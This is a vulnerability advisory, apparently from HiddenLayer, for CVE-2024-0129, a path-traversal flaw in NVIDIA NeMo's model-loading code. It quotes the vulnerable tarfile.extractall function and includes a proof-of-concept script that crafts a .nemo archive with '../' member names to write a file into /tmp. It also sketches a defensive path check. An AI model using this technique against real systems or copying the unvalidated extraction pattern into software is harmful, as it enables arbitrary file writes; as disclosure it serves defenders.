HiddenLayer, a Gartner-recognized Cool Vendor for AI Security, is the leading provider of Security for AI. Its security platform helps enterprises safeguard the machine learning models behind their most important products. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Founded by a team with deep roots in security and ML, HiddenLayer aims to protect enterprises’ AI from inference, bypass, and extraction attacks, as well as model theft. The company is backed by a group of strategic investors, including M12, Microsoft’s Venture Fund, Moore Strategic Ventures, Booz Allen Ventures, IBM Ventures, and Capital One Ventures.
October 24, 2024
Unsafe extraction of NeMo archive leading to arbitrary file write
CVE Number
CVE-2024-0129
Summary
The _unpack_nemo_file function, used by the SaveRestoreConnector class for model loading, calls tarfile.extractall() without validating the paths of the archive members, which can lead to an arbitrary file write when a model is loaded.
Products Impacted
This vulnerability is present in NVIDIA NeMo versions prior to r2.0.0rc0.
CVSS Score: 6.3
AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
CWE Categorization
CWE‑22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
Details
The cause of this vulnerability is in the _unpack_nemo_file function within the file /nemo/core/connectors/save_restore_connector.py.
def _unpack_nemo_file(path2file: str, out_folder: str, extract_config_only: bool = False) -> str:
    if not os.path.exists(path2file):
        raise FileNotFoundError(f"{path2file} does not exist")
    # we start with an assumption of uncompressed tar,
    # which should be true for versions 1.7.0 and above
    tar_header = "r:"
    try:
        tar_test = tarfile.open(path2file, tar_header)
        tar_test.close()
    except tarfile.ReadError:
        # can be older checkpoint => try compressed tar
        tar_header = "r:gz"
    tar = tarfile.open(path2file, tar_header)
    if not extract_config_only:
        tar.extractall(path=out_folder)
    else:
        members = [x for x in tar.getmembers() if ".yaml" in x.name]
        tar.extractall(path=out_folder, members=members)
    tar.close()
    return out_folder
The _unpack_nemo_file function is used by several functions and classes in NVIDIA NeMo, most notably the SaveRestoreConnector class which is used to save and load NeMo model files from disk.
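The unsafe step is that each member name is joined to out_folder and written without checking where the result lands. As an illustration only, the following is a minimal sketch of a path check performed before extraction. The helper names is_within_directory and safe_extract are hypothetical and are not taken from NeMo or from NVIDIA's fix; rejecting links outright is an assumption chosen for simplicity.

```python
import os
import tarfile


def is_within_directory(base_dir: str, target: str) -> bool:
    """Return True if target resolves to a location inside base_dir."""
    base = os.path.realpath(base_dir)
    resolved = os.path.realpath(target)
    return os.path.commonpath([base, resolved]) == base


def safe_extract(tar: tarfile.TarFile, out_folder: str, members=None) -> None:
    """Hypothetical helper: validate every member, then extract.

    Raises ValueError if a member is a link or would be written
    outside out_folder. Nothing is extracted when validation fails.
    """
    candidates = tar.getmembers() if members is None else list(members)
    for member in candidates:
        # Assumption: links are rejected, since they can redirect later writes.
        if member.issym() or member.islnk():
            raise ValueError(f"refusing to extract link: {member.name}")
        # os.path.join discards out_folder if member.name is absolute,
        # so absolute names are caught by the same check.
        destination = os.path.join(out_folder, member.name)
        if not is_within_directory(out_folder, destination):
            raise ValueError(f"path traversal blocked: {member.name}")
    tar.extractall(path=out_folder, members=candidates)
```

With a check along these lines, a member named ../../tmp/test.txt would raise ValueError instead of being written. Recent Python releases also ship built-in extraction filters for tarfile (for example, passing filter="data" to extractall), which may be preferable where the runtime supports them.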
To replicate this vulnerability, create a tar archive containing a member whose name is a relative path that climbs out of the extraction directory using ../ components, then load the archive with the SaveRestoreConnector restore_from function:
import tarfile

# Create the file that will be packed into the archive
with open("test.txt", "w") as f:
    f.write("This is a test file")

def change_name(tarinfo):
    # Prefix the member name with a traversal sequence targeting /tmp/
    tarinfo.name = "../../../../../../../../tmp/" + tarinfo.name
    return tarinfo

with tarfile.open("test.nemo", "w:gz") as tar:
    tar.add("test.txt", filter=change_name)

# Load the archive with restore_from
import nemo.collections.asr as nemo_asr
model = nemo_asr.models.EncDecDiarLabelModel.restore_from(restore_path="test.nemo")
This results in test.txt being written to the /tmp/ directory: